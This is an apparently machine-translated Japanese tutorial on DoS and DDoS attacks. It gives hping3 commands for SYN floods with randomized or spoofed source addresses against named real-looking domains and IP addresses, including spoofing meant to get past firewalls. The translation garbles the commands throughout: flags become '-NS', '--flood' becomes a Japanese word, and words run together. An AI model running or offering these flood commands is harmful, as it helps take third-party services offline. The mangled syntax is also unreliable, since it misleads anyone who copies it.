hping3洪水ddos

Hping3 Flood Ddos



このチュートリアルでは、hping3ツールを使用したDDOS(分散型サービス拒否)攻撃に焦点を当てます。すでにDOS(サービス拒否)攻撃とDDOS攻撃に精通している場合は、hping3の実用的な手順を読み続けることができます。それ以外の場合は、これらの攻撃がどのように機能するかを学ぶことをお勧めします。

DOS攻撃


サービス拒否(DOS)攻撃は、サービスへのアクセスを拒否するための非常に単純な手法です(そのため、サービス拒否攻撃と呼ばれます)。この攻撃は、特大のパケットまたは大量のパケットでターゲットを過負荷にすることで構成されます。







この攻撃は非常に簡単に実行できますが、ターゲットの情報やプライバシーを危険にさらすことはなく、侵入型の攻撃ではなく、ターゲットへのアクセスを阻止することのみを目的としています。
ターゲットが処理できない大量のパケットを送信することにより、攻撃者はサーバーが正当なユーザーにサービスを提供することを防ぎます。



DOS攻撃は単一のデバイスから実行されるため、攻撃者のIPをブロックすることで簡単に阻止できますが、攻撃者はターゲットIPアドレスを変更したり、スプーフィング(クローン)したりすることもできますが、ファイアウォールがそのような攻撃に対処することは難しくありません。 、DDOS攻撃で起こることとは反対です。



DDOS攻撃

分散型サービス拒否攻撃(DDOS)はDOS攻撃に似ていますが、異なるノード(または異なる攻撃者)から同時に実行されます。通常、DDOS攻撃はボットネットによって実行されます。ボットネットは、自動化されたスクリプトまたはプログラムであり、コンピューターに感染して自動化されたタスク(この場合はDDOS攻撃)を実行します。ハッカーはボットネットを作成し、ボットネットがDOS攻撃を開始する多くのコンピューターに感染する可能性があります。多くのボットネットが同時に攻撃しているという事実は、DOS攻撃をDDOS攻撃に変えます(これが分散型と呼ばれる理由です)。





もちろん、DDOS攻撃が実際の人間の攻撃者によって実行された例外もあります。たとえば、世界中の何千人もの人々によって統合されたハッカーグループAnonymousは、実装が簡単なため、この手法を非常に頻繁に使用しました(原因を共有するボランティアのみが必要でした)。これは、たとえば、アノニマスが侵略中にカダフィのリビア政府を完全に切断した方法であり、リビアの国家は世界中からの何千人もの攻撃者の前で無防備なままでした。

このタイプの攻撃は、多くの異なるノードから実行される場合、防止および停止するのが非常に難しく、通常は対処するために特別なハードウェアが必要です。これは、ファイアウォールと防御アプリケーションが数千の攻撃者に同時に対処する準備ができていないためです。これはhping3の場合ではありません。このツールを介して実行される攻撃のほとんどは、防御デバイスまたはソフトウェアによってブロックされますが、ローカルネットワークや保護が不十分なターゲットに対しては役立ちます。



hping3について

ツールhping3を使用すると、操作されたパケットを送信できます。このツールを使用すると、パケットのサイズ、量、および断片化を制御して、ターゲットを過負荷にし、ファイアウォールをバイパスまたは攻撃することができます。 Hping3は、セキュリティや機能のテストの目的で役立ちます。Hping3を使用すると、ファイアウォールの有効性をテストしたり、サーバーが大量のパケットを処理できるかどうかをテストしたりできます。以下に、セキュリティテストの目的でhping3を使用する方法について説明します。

hping3を使用したDDOS攻撃の開始:

DebianおよびベースのLinuxディストリビューションでは、以下を実行してhping3をインストールできます。

aptインストールhping3-と

単純なDOS(DDOSではない)攻撃は次のようになります。

sudohping3-NS - 洪水 -V -NS 80170.155.9.185

どこ:
sudo: hping3を実行するために必要な特権を与えます。
hping3:
hping3プログラムを呼び出します。
-NS: SYNパケットを指定します。
-洪水: 裁量で撮影すると、返信は無視され(そのため、返信は表示されません)、パケットは可能な限り高速に送信されます。
-V: 冗長性。
-p 80: ポート80では、攻撃するサービスのこの番号を置き換えることができます。
170.155.9.185: ターゲットIP。

ポート80に対してSYNパケットを使用したフラッド:

次の例は、lacampora.orgに対するSYN攻撃を示しています。

sudohping3 lacampora.org-NS -NS -NS 120 -NS -NS 80 - 洪水 --rand-source

どこ:
Lacampora.org: ターゲットです
-NS: 簡単な出力
-NS: ホストの代わりにターゲットIPを表示します。
-d 120: パケットサイズを設定する
–rand-source: IPアドレスを非表示にします。

次の例は、別の洪水の可能性のある例を示しています。

ポート80に対するSYNフラッド:

sudohping3--rand-sourceivan.com-NS -NS -NS 80 - 洪水

hping3を使用すると、偽のIPを使用してターゲットを攻撃することもできます。ファイアウォールをバイパスするために、ターゲットIP自体、または既知の許可されたアドレスを複製することもできます(たとえば、Nmapまたはスニファを使用して確立されたリッスンを行うことができます)。接続)。

構文は次のようになります。

sudohping3-に <偽のIP>> <目標>> -NS -NS -NS 80 - もっと早く -c2

この実際の例では、攻撃は次のようになります。

sudohping3-に190.0.175.100 190.0.175.100-NS -NS -NS 80 - もっと早く -c2

hping3に関するこのチュートリアルがお役に立てば幸いです。 Linuxとネットワークに関するその他のヒントと更新については、LinuxHintをフォローしてください。